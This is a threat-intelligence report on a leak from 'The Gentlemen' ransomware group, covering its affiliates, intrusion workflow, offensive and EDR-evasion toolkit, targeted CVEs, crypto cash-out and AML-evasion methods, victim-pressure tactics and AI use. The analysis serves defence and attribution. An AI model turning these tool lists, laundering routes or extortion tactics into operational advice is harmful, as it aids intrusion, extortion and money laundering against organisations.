  • The internal discussions provide a rare end‑to‑end view of the operation: they detail initial access paths (Fortinet and Cisco edge appliances, NTLM relay, OWA/M365 credential logs), the division of roles, the shared toolsets, and the group’s active tracking and evaluation of modern CVEs such as CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073.
  • Screenshots from ransom negotiations were also leaked, showing a successful case where the group received 190,000 USD, after starting with an initial demand (anchor) of 250,000 USD.
  • Further chats indicate that stolen data from a UK software consultancy was later reused to attack a company in Turkey. The Gentlemen used this during negotiations as a dual‑pressure tactic: they portrayed the UK firm as the “access broker,” while mentioning to provide “proof” to the Turkish company that the intrusion originated from the UK side and encouraging it to consider legal action against the consultancy.
  • By collecting all available ransomware samples, Check Point Research identified 8 distinct affiliate TOX IDs, including the administrator’s TOX ID. This suggests that the admin not only manages the RaaS program but also actively participates in, or directly carries out, some of the infections.


Introduction

The Gentlemen ransomware‑as‑a‑service (RaaS) operation is a relatively new group that emerged around mid‑2025. Its operators advertise the service across multiple underground forums, promoting their ransomware platform and inviting penetration testers and other technically skilled actors to join as affiliates.

In 2026, based on victims listed on the data leak site (DLS), The Gentlemen appears to be one of the most active RaaS programs, with approximately 332 published victims in just the first five months of 2026. This volume places the group as the second most productive RaaS operation in that period, at least among those that publicly list their victims.

During our previous publication, Check Point Research analyzed a specific infection carried out by an affiliate of this RaaS. In that case, the affiliate used SystemBC, and the associated command‑and‑control (C&C) server revealed more than 1,570 victims.

In this publication, we focus on the affiliate program itself and the actors who participate in it. On May 4th, 2026, The Gentlemen administrator acknowledged the leak of an internal database used by the group, which contained operational information about their infrastructure, affiliates, and victims. Check Point Research obtained what appears to be a partial leak of the group’s internal chats and related data, which was briefly posted on an underground forum before being removed. Later on, the leak also appeared on another underground forum.

The leaked material includes detailed conversations between the RaaS operators and their affiliates across several internal channels (such as INFO, general, TOOLS, and PODBOR). In these chats, they coordinate ongoing intrusions, exchange toolsets and EDR‑kill packages, discuss infrastructure and backend components (including the Rocket database and NAS storage), review CVEs and exploit paths (for example Fortinet, Cisco, and NTLM relay issues), and talk about specific victims, campaigns, and payouts. Together, these messages provide a rare inside view of how The Gentlemen plans, executes, and scales its ransomware operations.


The Gentlemen RaaS Admin

The Gentlemen RaaS administrator has been very active and vocal on various underground forums, trying to attract affiliates with an aggressive profit-sharing model: 90% for affiliates and 10% for the operator.

In September 2025, in one of the first posts promoting the RaaS program, the account Zeta88 published a message advertising the service and inviting individual penetration testers to join as affiliates.

Figure 1 — Zeta88 advertising The Gentlemen’s RaaS.

Later on, the official posts for this ransomware program started to be published by another account, The Gentlemen. The administrator also shared their TOX ID across several forums.

Figure 2 — RaaS admin in underground forum.

The same TOX ID can be seen on the onion data leak site (DLS), where it is used by affiliates or compromised victims to contact the administrator.

Figure 3 — Onion page TOX ID.

In a post on an underground forum, where the administrator demonstrated how affiliates can build the ransomware, we can see the administrator’s profile page, where their TOX ID is again visible in the corresponding field.

Figure 4 — Image uploaded by RaaS admin.

In the second shared image, we again observe the same TOX ID and see how the target or victim entry is supposed to look from an affiliate’s perspective.

Figure 5 — Image uploaded by RaaS admin.

Considering that the initial post was made by Zeta88, it is likely that this account belongs to the administrator and that their TOX ID is F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E. This assessment is based on the fact that the same TOX ID appears consistently across different contexts: in the early recruitment posts, in the onion data leak site (DLS), and in the screenshots showing the administrator’s profile and communication fields. Taken together, these overlaps strongly suggest that Zeta88, the later The Gentlemen account, and this TOX ID are all controlled by the same RaaS administrator.


RaaS Affiliates

Check Point Research collected most of the available artifacts related to The Gentlemen RaaS from online sources. Based on the current 412 public victims listed on the data leak site (DLS), and considering that there are likely additional victims who paid and therefore were not published, we identified 29 unique campaigns in public sources such as VirusTotal.

For each of these 29 campaigns, we extracted the TOX ID associated with the corresponding affiliate. Our analysis shows that these campaigns were conducted by 8 unique TOX IDs.

15CE8D5DB0BAC3BCBB1FA69F2E672CC54EFBEC7684DA792F3CBF8B007A9FEA1D16374560DFA5
2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
88984846080D639C9A4EC394E53BA616D550B2B3AD691942EA2CCD33AA5B9340FD1A8FF40E9A
98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
F96C481CBB0D6E7BDA49C6D68CFDB1D284354961534EDEEDA854C672B48A8D6B7146F90BDACB

There are almost certainly more affiliates involved in this group, however, based on our current locker visibility, we can confidently confirm 29 discovered campaigns and ransomware samples.

CmpID: 03860d116701cdc9d9bf9c45099bb3d3 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 11e7baca7e652995b2364fdab0d362b7 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 2cd4eb358c45ca783a20ec854a5a860c TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 2e5d1a352885a6efd84dbc0387cbc79e TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: 3b7b4f2d33bdfb8a31b480d0eb2815cd TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 4a94d2b730a5a63e6cd54a9b0bb4ea71 TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 4e0c37cbf4dde9683943c8a738e5b00a TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: 51dec3e170f8a181cc9aea8dcc90c7ab TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 583fe1c1a39f6b873a5c0997bea1f657 TOX: 15CE8D5DB0BAC3BCBB1FA69F2E672CC54EFBEC7684DA792F3CBF8B007A9FEA1D16374560DFA5
CmpID: 697f182826495662427ca49edbb345fc TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 71d503709af88821c183a1d0b7ae06ec TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 721606b3659f2c2d80a196ed3cd60053 TOX: F96C481CBB0D6E7BDA49C6D68CFDB1D284354961534EDEEDA854C672B48A8D6B7146F90BDACB
CmpID: 735069890a414869f0113de820ba9afb TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 74ea100b581ec32ea6c2ac2a0030a9f6 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 776e86c13433747299a4e5f9f22e3415 TOX: 2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
CmpID: 7aae8fd9187c88dd0292cce1abd050e2 TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 82160a7da5fc4c935e6f48d38a5aaaa6 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 893f735e9a8cc9814dc6eccd5579561c TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 8fceea4fd9ce32dd620ccd580297c7c5 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 92d8bd2a6ee7f6d5c84e037066ce0539 TOX: 2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
CmpID: a023a6b15419600dc3f6b93e11761dfe TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: a73526d89e5fb7b57f50d8da340e53e9 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: abd11823ddcc3d746ad8621e677a93eb TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: b5b42ac289581b3387ebf120129a19a6 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: b68e019efb39b85f5a0326e22fd4498a TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: bc6b87c79bc71a78da623d031ec1a958 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: d75246d230f22b1da6bbf5fceeed2ef2 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: da9cff1b478b64d47b68d50330e96c60 TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: ead0d7a8ae0a6ffb7f0a5873fec4ff5e TOX: 88984846080D639C9A4EC394E53BA616D550B2B3AD691942EA2CCD33AA5B9340FD1A8FF40E9A

Based on this small collection of samples, most of the campaigns appear to have been conducted by the affiliate using the TOX ID 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3. It is also noteworthy that the RaaS administrator’s TOX ID has been observed in four unique infections. This suggests that the administrator not only manages the RaaS program but also actively participates in, or directly carries out, some of the infections.


RaaS Leak

On May 4th, 2026, on an underground forum, the RaaS administrator published a post acknowledging the claims of an internal leak involving their so‑called Rocket database, an internal backend system used to store operational data, and addressed his affiliates directly about the incident.

Figure 6 — The Gentlemen RaaS post.

The message continues in a dismissive tone toward the leak seller and then shifts focus back to “more interesting” topics. These include a full overhaul of the communication structure, the deployment of a new NAS with unlimited storage, and several technical upgrades to the locker, such as removing hardware breakpoints, performing NTDLL unhooking, and patching ETW to suppress Event Tracing for Windows.


Demanding ransom from a RaaS

On May 5th, 2026, the account n7778 with TOX ID 7862AE03A73AAC2994A61DF1F635347F2D1731A77CACC155594C6B681D201F7AD6817AD3AB0A advertised the sale of The Gentlemen’s hacked data on underground forums for 10,000 USD, payable in Bitcoin.

Figure 7 — Account selling The Gentlemen RaaS Data.

In the following days, the same account posted two MediaFire links containing proof files supporting the claimed leak.

Figure 8 — Partial leaks.

The first leaked data is a text file that contains the contents of the shadow file from The Gentlemen’s server, including user account entries and their password hashes. The file lists many usernames, among them zeta88, 3NT3R, B1d3n, C0CA, d0wnloAd1, equal1z3r, F3N1X, Gblog88, JLL, LDW, n0n3, PRTGRS, W1Z. Notably, we again see the zeta88 account, the same handle that was used in the initial underground post advertising the RaaS program, further linking this server to the RaaS administrator.

Figure 9 — shadow file content.

The second leaked data set contains partial conversations between the RaaS operators and their affiliates across several internal channels (such as INFO, general, TOOLS, and PODBOR). In these chats, they coordinate ongoing intrusions, exchange toolsets and EDR‑kill packages, discuss infrastructure and backend components, review CVEs and exploit paths, and talk about specific victims, campaigns, and payouts.

While the partial leaked data that we obtained is around 44.4 MB, a screenshot shared by the same account on another underground forum shows a total size of approximately 16.22 GB, which likely corresponds to the full leaked data set.

Figure 10 — Full leaked data screenshot.


Roles & Structure

The group appears to have a clear division of roles and responsibilities. At the core, the main operator and developer, zeta88 (most likely hastalamuerte), runs the infrastructure and builds and maintains the custom ransomware locker, the RaaS panel and builder (Linux with containers and a TOR front), as well as the GPO‑based spread mechanism and the locker’s “spread” module. This operator also curates toolsets in the TOOLS channel, including EDR kill kits and kiljalki collections, selects targets, and assigns them to specific teams, often talking about “targets”, “подбор” (selection) channels, and distributing corporate victims to groups of 2–3 people. In addition, they manage payouts and negotiations, including multi‑million ransom discussions (“переговоры на 10кк”).

Figure 11 — Image shared in the chats, zeta88 – Admin.

Considering our previous assessment that the RaaS administrator also runs campaigns himself (based on TOX IDs), the leaked chats reinforce this view: they show him personally deploying the locker and encrypting at least one victim’s environment.

Figure 12 — zeta88 locking message.

Often, messages sent by zeta88 appear to be copied or adapted from earlier messages made by hastalamuerte, and affiliates frequently mention hastalamuerte by name. Taken together with previous findings and earlier RaaS posts linked to zeta88, these patterns strongly suggest that hastalamuerte and zeta88 are very likely the same person.

Figure 13 — zeta88 – hastalamuerte message.

Below this core role, key operators or affiliates such as qbit and quant handle more hands‑on operational work. qbit is a practical operator on many cases, responsible for scanning and filtering Fortinet VPNs and other edge devices, performing reconnaissance and persistence (including “крепиться клаудом” (English: “to establish persistence via the cloud”) through Cloudflare tunnels or Zero Trust solutions), and using tools such as NetExec (NXC), RelayKing, PrivHound, and NTLM relay scanning. qbit frequently requests clear EDR killer sets, manuals, and guidance for locking ESXi environments, and also brings in new bot or access suppliers (“поставщик ботов”) (English: “supplier of bots”). quant focuses on log‑based access (“логи ЛБ”, i.e. spilled credentials for OWA/O365 and similar services) and maintains a custom log parser and proprietary credential/data collector, referred to as buildx641, which is run from a domain‑joined machine, uses vssadmin, shadow copies, ntds.dit, and SYSTEM copies, and collects and compresses data from multiple hosts. quant is oriented toward OW/OVA spam and higher‑value (“тир1”) (English: “tier‑1”) victims and has set up a powerful “brute server” (Threadripper PRO, 128 GB RAM, RTX 5090) for large‑scale brute forcing.

Around these core and key operators, there are several other accounts, including Wick, mAst3r, Protagor, Bl0ck, JeLLy, Kunder, and Mamba who take on various roles such as red‑teamers, advertising partners, access brokers, or case‑specific collaborators; for example, Protagor is mentioned in connection with OV (online vault/OWA‑type) spam, while Mamba acts as an access broker for Fortinet VPNs sourced from ramp.

Through this specific leak, we identified 9 unique accounts actively communicating with each other: Kunder, qbit, JeLLy, Protagor, zeta88, Bl0ck, Wick, quant, and mAst3r. This internal interaction pattern supports the view that these accounts form a coordinated operational network within The Gentlemen RaaS ecosystem. This number aligns with our earlier assessment based on the unique TOX IDs extracted from the ransomware lockers.

Group members collaborate on various infections and share the profits as well. As a result, the 90% share allocated to the affiliate is often split among multiple affiliates who worked together to achieve a successful intrusion.

Figure 14 — Collaboration and profit sharing.

Based on the analyzed chat messages, the organization’s structure appears to match the model shown in the following image. It is likely that additional members exist who do not appear in this specific leak, but the roles and relationships we observe here are consistent across the available data. There are also indications of an internal separation between trusted members and newcomers—for example, one message notes that “that Rocket is still alive – there are rookies there”—suggesting a tiered or layered structure within the group.

Figure 15 — Organization diagram.


Operational workflow

The conversations from the leak show a fairly standard but well‑organized operational workflow. The group claims to usually gain initial access through exposed edge devices such as VPN appliances, firewalls, and other internet-facing systems, with a particular focus on platforms like Fortinet FortiGate and Cisco. They combine different methods to achieve this, including credential brute‑forcing against web or VPN panels, exploiting known vulnerabilities, and buying access from third‑party “bot” or access brokers. Screenshots shared in the chats also show them searching for accounts and credentials in data‑breach search engines. Once they obtain a foothold, they treat these systems as pivots to move deeper into the internal network.

Figure 16 — Searching credentials & accounts.

After gaining access, the operators perform internal reconnaissance and privilege escalation to understand the environment and obtain higher-level permissions, often aiming for domain administrator access. They rely on a mixture of Active Directory discovery, certificate abuse, and various local privilege escalation techniques. At the same time, they invest significant effort into disabling or bypassing security tools such as EDR and antivirus solutions, using a combination of misconfigurations, registry abuse, logging mechanisms, and bring-your-own-vulnerable-driver–style (BYOD) techniques to tamper with or overwrite security binaries.

With elevated access and reduced defensive visibility, the group focuses on expanding across the network and preparing for the final stages of the attack. This includes lateral movement, establishing additional tunnels or proxies for reliable connectivity, and relaxing security settings to make further operations easier. They also harvest credentials and browser-based sessions to reuse existing access to corporate services. Data exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently, often targeting NAS devices, backup systems, and virtualization infrastructure. Finally, once the environment is prepared and critical data is in their control, they deploy their custom ransomware “locker,” which is designed to spread quickly across the network, leverage existing administrator sessions, and encrypt systems in a coordinated manner.


Tools & Infra

The leaked conversations show that The Gentlemen RaaS operators use a repeatable and fairly mature toolset to support their operations. For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks. For offensive operations, they use a range of red‑team utilities such as NetExec, RelayKing, TaskHound, PrivHound, CertiHound, and others to perform Active Directory discovery, certificate abuse, privilege escalation, and file share discovery. A separate group of tools is dedicated to EDR and AV evasion, including EDRStartupHinder, gfreeze, glinker, and DumpBrowserSecrets, as well as techniques inspired by public research on abusing Windows logging and Event Tracing for Windows (ETW). Finally, they support these activities with infrastructure and helper tools like port scanners (gogo.exe), usage guides, OSINT extensions, and password‑cracking services, which together give them a reusable framework for running repeated intrusions and ransomware deployments.

CategoryTool / ResourcePurpose / UsageReference / Notes
C2 / Remote AccessZeroPulseRemote access / C2 framework for controlling compromised hosts.https://github.com/jxroot/ZeroPulse
C2 / Remote AccessVelociraptorUsed as a covert C2 platform, including memory and LSASS dumping.Often used with signed builds to reduce detection.
C2 / Remote AccessCloudflare Zero Trust / TunnelsProvides stealthy tunnels into victim networks over HTTPS.Used together with custom VPN setups.
VPN / Network Accesswireguard-installAutomates WireGuard VPN deployment.https://github.com/angristan/wireguard-install
VPN / Network Accessopenvpn-installAutomates OpenVPN server setup.https://github.com/angristan/openvpn-install
VPN / Network AccessDouble-VPN-with-OpenVPNConfigures double‑layer OpenVPN routing.https://github.com/pizdatiigus/Double-VPN-with-OpenVPN
Offensive / Red‑TeamNetExec (NXC)Multi‑purpose offensive framework for AD, SMB, WinRM, and more.Internal usage guide via a shared NXC gist.
Offensive / Red‑TeamTaskHoundTask and privilege abuse / persistence helper.Used post‑exploitation.
Offensive / Red‑TeamPrivHoundIdentifies local privilege escalation paths and persistence opportunities.Integrates with BloodHound data.
Offensive / Red‑TeamRelayKing-DepthFinds and exploits NTLM relay paths across protocols.https://github.com/depthsecurity/RelayKing-Depth
Offensive / Red‑TeamCertiHoundEnumerates and detects ADCS misconfigurations (ESC1–ESC17).Used via NetExec integration.
Offensive / Red‑TeamTitanisOffensive tooling for Windows logging / ETW manipulation.https://github.com/trustedsec/Titanis
Offensive / Red‑TeamMANSPIDERSearches file shares for sensitive strings and documents.Used for locating valuable data.
Offensive / Red‑TeamPowerZureAbuses Azure / cloud misconfigurations.Used for cloud‑side access and escalation.
Offensive / Red‑TeamRegPwnRegistry‑based privilege escalation and service abuse.Often used for MSI service abuse.
Offensive / Red‑TeamKslDumpDumps Kerberos / LSASS‑related material.Used for credential theft.
Offensive / Red‑TeamKslKatzKerberos / LSASS post‑exploitation tool similar to credential dumpers.Complements KslDump.
EDR / AV EvasionEDRStartupHinderBlocks or delays EDR processes at startup.Based on the EDR-Startup-Process-Blocker concept.
EDR / AV EvasiongfreezePart of their EDR “killer” toolkit to hinder security products.Derived from EDR‑blocking research/code.
EDR / AV EvasionglinkerAnother component in their EDR evasion sets.Often grouped with gfreeze.
EDR / AV EvasionDumpBrowserSecretsDumps browser cookies and secrets for session hijacking.Used to reuse corporate web sessions.
EDR / AV Evasionzerosalarium ETW/log tricksPublic research they follow for ETW and log‑based EDR kill techniques.Multiple posts referenced for inspiration.
Infra / Scanninggogo.exeScanner for common ports and exposed services.Used in early discovery phases.
Infra / ScanningNXC usage gistInternal guide for effective NetExec usage.https://gist.github.com/gitgotgitgotit/81a578e065da1ccd8c81a8e90c309275
OSINT / Helper ToolsSputnik browser extensionOSINT aggregation extension to support recon.Helps enrich target information.
OSINT / Helper Toolschamd5.orgOnline password hash cracking service.Used for recovering cleartext passwords.
OSINT / Helper Toolshashcracking_botBot‑based password cracking service.Complements other cracking methods.

The leaked chats show that the group pays close attention to other ransomware operations, including the leaked Black Basta negotiations. In particular, they discuss Black Basta’s approach to code signing and note how that group allegedly used VirusTotal to search for legitimate code‑signing certificates, which were then targeted for brute‑force attacks on their private keys. The Gentlemen actors refer to this technique as a model they can reuse or adapt, highlighting their interest in abusing trusted certificates to make their binaries look legitimate and harder to detect.

Figure 17 — Code signing conversations.


AI mentions

The Gentlemen mention AI usage in multiple channels and for various purposes. While it is clear that they have already used AI for code‑assisted development, including experiments with Chinese models, more advanced use cases—such as locally deploying models to analyze large volumes of exfiltrated victim data—are only discussed at a conceptual level. These ideas are suggested in the chats but do not appear to be fully implemented.

zeta88 states that he built the GLOCKER admin panel in three days using AI‑assisted coding. He is candid about the limitations of this approach, noting that while AI can speed up development, you still need to understand what you are doing and be able to guide and correct the code it produces.

Figure 18 — zeta88 “vibe-coded” the Panel.

Members share their AI preferences across different chats. zeta88 states that he finds DeepSeek, Qwen, Kimi, and Emi the most effective models for his purposes, particularly for coding assistance and technical queries.

Figure 19 — AI preferences.

He also suggests adding more Chinese LLMs to their toolkit, in addition to those they are already considering or using, such as DeepSeek and Qwen.

Figure 20 — Chinese LLMs suggestions.

A couple of months later, qbit shares in the INFO channel their recommendation for “the most radical neural network, which creates any content without censorship. Runs on Qwen 3.5 with all barriers removed… Zero refusals. Absolutely no restrictions.”

Figure 21 — Qwen 3.5 post.

zeta88 directs affiliates to use AI as a quick reference—for example, to look up FortiGate internals—rather than asking in the channel.

Figure 22 — Usage of AI as quick reference.

For more challenging tasks such as operational data analysis, identifying high‑value access points, and offloading much of the manual data‑triage work to an AI model, the operators explicitly discuss using an uncensored, self‑hosted LLM. However these suggestions appear to remain theoretical, as Protagor admits, “I have no idea how to do that, but I think it’s possible.

Figure 23 — Local, self-hosted LLM.

Screenshot shared in the chats shows an LLM response on how to send an email to all users via the Jira admin interface, in Russian. It describes two methods, mainly using Jira Automation and user groups.

Figure 24 — Screenshot shared in the chats.

The group appears to be experimenting with well‑known Chinese LLMs and has considered using locally hosted models to assist with data triage on stolen information.


CVEs and Exploits

While the group discusses these vulnerabilities, shares related links, and occasionally attempts to exploit specific systems using particular CVEs, we cannot confirm whether the targeted machines were actually vulnerable to the exact vulnerabilities they referenced.

  • CVE-2024-55591 – FortiOS management interface

This vulnerability affects the FortiOS management interface and fits directly into their broader focus on Fortinet appliances as high‑value initial access points. While the chats do not show detailed exploitation steps, the presence of this CVE alongside their FortiGate targeting suggests it is part of the set of vulnerabilities they track for potential use against exposed management interfaces.

Figure 25 — CVE-2024-55591, related message.
  • CVE-2025-32433 – Erlang SSH vulnerability (Cisco context)

In the logs, qbit shares a proof-of-concept (PoC) for CVE-2025-32433, and zeta88 comments on its quality and applicability. This shows that the group is not simply aware of the CVE but is actively evaluating whether it can be used in real operations, specifically in environments where Cisco or Erlang-based SSH services are exposed. Even if they are cautious about PoC reliability, the discussion confirms that this vulnerability is part of their potential exploit toolkit.

Figure 26 — qbit & zeta88 related posts.
  • CVE-2025-33073 – NTLM reflection / NTLM relay

qbit references RelayKing and shares output showing domains being scanned for NTLM relay issues, including checks that explicitly cover CVE-2025-33073. This is strong evidence that they are not just reading about the vulnerability but have integrated RelayKing into their standard reconnaissance process to generate target lists for tools like ntlmrelayx. In other words, CVE-2025-33073 is a vulnerability they actively scan for and intend to exploit as part of broader NTLM relay workflows.

Figure 27 — Mention of CVE-2025-33073.
  • Other Exploit Paths (Without Explicit CVE IDs)

The operators also make heavy use of technique-based exploits where no specific CVE number is mentioned in the chats. These include:

  • MSI service abuse via RegPwn, used for privilege escalation.
  • Veeam to domain admin paths, based on public write‑ups about misconfigured backup infrastructure.
  • iDRAC to domain admin paths, leveraging Dell iDRAC weaknesses.
  • WPR, AutoLogger, and ETW manipulation techniques documented by zerosalarium and others to overwrite or disable security binaries.


Payments & Negotiations

Zeta88 acts as the organizer/administrator, distributing cryptocurrency payouts to team members (including those who are “AFK”) and advising on how to cash out proceeds via Bitcoin wallets (Guarda, Trust Wallet, Exodus). The group discusses AML (Anti-Money Laundering) evasion strategies. Zeta88 sends a BTC transaction to Kunder as a payout, which Kunder confirms receiving.

Figure 28 — Transaction link shared.

The specific mentions of how they handle Bitcoin laundering/cash out:

  1. Exchange Chains (“связки обмена”) Zeta88 mentions running ~800 transactions through “buy desks” (скупов) via exchange chains, or sometimes sending directly, suggesting chain-hopping to obscure transaction origins.
  2. AML Checking They discuss whether their BTC is “clean” and reference a buyer who actively checks AML scores before transacting. They’re uncertain how the scoring works but are aware their coins could be traced.
  3. Tinkoff QR Code Cash-Out A specific method mentioned: a buyer converts BTC to cash via Tinkoff bank QR codes, with minimums of 400k rubles (previously 250k). This converts crypto directly to Russian banking infrastructure.
  4. Physical Cash Delivery Kunder mentions “locking in the rate” and a guy physically bringing cash at the end of the month, a classic peer-to-peer OTC (over-the-counter) arrangement that bypasses exchanges entirely.
  5. Wallet Infrastructure They recommend non-custodial wallets (Guarda, Trust Wallet, Exodus) specifically to avoid KYC/AML controls that centralized exchanges enforce.

Blurry screenshots from the leak also shed light on the financial side of the operation. Although not fully legible, they appear to show a negotiation where the group secured approximately 190,000 USD after a discount of about 60,000 USD from the initial ransom demand.

Figure 29 — Agreement to pay 190,000 USD.

zeta88 is very aware of the importance of maximizing pressure on extorted victims to increase the chances of payment. In his private channel, he drafts a generic follow‑up letter that can be adapted to any company, emphasizing the costs of not paying the ransom, including regulatory exposure, reputational damage, and operational impact, and citing assessments from previous attacks. This is not the standard ransom note deployed alongside the encryption, but an additional, more tailored communication intended to reinforce the pressure on the victim.

Figure 30 — Negotiation playbook.


Interesting Negotiation Case

In a high‑profile attack in April 2026, a software consultancy company from United Kingdom publicly reported a breach. The company’s leadership stated in an open letter that only “typical business data, including business contact information, contracts, and NDAs related to client work” had been accessed.

From what appears to be a personal channel used by zeta88, he drafts a ransom demand letter addressed to the UK company, detailing what The Gentlemen claim to have exfiltrated, including customer infrastructure data, secrets, OAuth credentials, and more. The letter explicitly emphasizes potential GDPR violations as leverage to pressure the victim into paying.

Figure 31 — Ransom note.

Two weeks later, the group published the consultancy’s identity and breach details on their data leak site (DLS). According to the internal chats, data exfiltrated from the consultancy was then reused both before and during attacks against a company in Turkey, where The Gentlemen gained initial access via a vulnerable VPN appliance.

Figure 32 — Forti access to company in Turkey.

zeta88 ran this operation alongside Protagor, creating a backdoor Okta service account himself—typical of his intensive, hands‑on involvement in many of the intrusions documented in the leaked discussions. During the same campaign, zeta88 explicitly references data from the UK consultancy breach to cross‑reference and enrich information about the Turkish company, illustrating how prior compromises are used to enrich and support new attacks.

Figure 33 — UK company containing information for Turkish company.

One example mentioned was an internal “Transfer/Migration Document” (in the local language), an internal project document the consultancy maintained in its own collaboration platform describing work they did for the company in Turkey. This document, stolen in the first breach, was then used in the second.

The group discussed how best to use this access for extortion. In their internal chats, they talked about publishing the company from Turkey on their DLS together with a statement that, The access to the company in Turkey was obtained through the compromised consultancy from United Kingdom.

Figure 34 — DLS statement discussions.

This served a dual purpose:

  1. Punishing the consultancy (UK), which the actors described as “a very bad company.”
  2. Increasing pressure on the company in Turkey, by promising to show exactly how they gained access so that, the Turkish would be encouraged to legally pursue the consultancy in UK.
Figure 35 — Initial access proof.

Eventually, the Turkish company was published on the group’s DLS, and the attackers “credited” the consultancy in UK as their “access broker”.


Their View of Other RaaS Programs and Actors

The actors consistently frame the RaaS ecosystem through the lenses of brand strength, payout reliability, and affiliate leverage (percentage splits and control over negotiations). Among the programs mentioned, they clearly distinguish a small “top tier” from a broader landscape of lesser or untrusted players.

Program / GroupThings DiscussedSubjective Sentiment (Their View)
HelloKittyName/brand as something they’d like to use; jokes about linking to the real Hello Kitty site and putting (R) everywhere; described explicitly as a “мощный бренд”.Very positive on brand strength and recognition; sees it as a powerful marketing asset.
KrakenMention that “товарищи кракен” wrote to qbitqbit later says their team might “move” over to zeta88’s side.Neutral‑pragmatic; current or past orbit, but clearly willing to switch away for better options.
Dragon ForceOne of only two programs zeta88 would choose from “all presented”; explicitly says they pay both operators and adverts; only negative comments heard were about their software/panel.Strongly positive overall; trusted, in the top tier of programs they respect.
GunraListed among candidate PPs for a supplier; zeta88 says “че эт ваще такое…”, and lumps it with Hyflock; calls the operator “этот мудень”.Negative; unserious / low‑relevance; clear disdain for the operator.
HyflockSame context as Gunrazeta88 dismisses it in the same breath as Gunra, with the same derogatory comment about the person behind it.Negative; grouped with Gunra as not to be taken seriously.
ShadowByt3$ RAASAppears in the candidate list; zeta88 simply comments “хз” (doesn’t know).Neutral; no formed opinion, neither trust nor distrust expressed.
AnubisAppears in the candidate list; zeta88 asks “% видел он?”, focusing on what percentage they take.Cautious / skeptical; interest hinges on profit split; no clear positive trust.
CHAOSAppears in the candidate list; zeta88 asks whether they will still take that supplier (“возьмут ли они его еще”).Uncertain; doubts about acceptance / relationship continuity; not a clearly preferred option.
LockBit (tooling)quant asks what a локбит тулза actually is (builder or decryptor), notes he has not opened it; no explicit evaluation of the group itself.Curious but cautious; tooling is not trusted or fully understood yet; no explicit sentiment on LockBit group.
Black Basta / Devmanquant asks if “блек баста это девман”; zeta88 speaks harshly about “David” and his link to Devman, calls him “мудак” and “чепуха”, wishes them невыплат (non‑payment).Strongly negative but personalized; animosity toward David/Devman rather than a structured view of the RaaS.
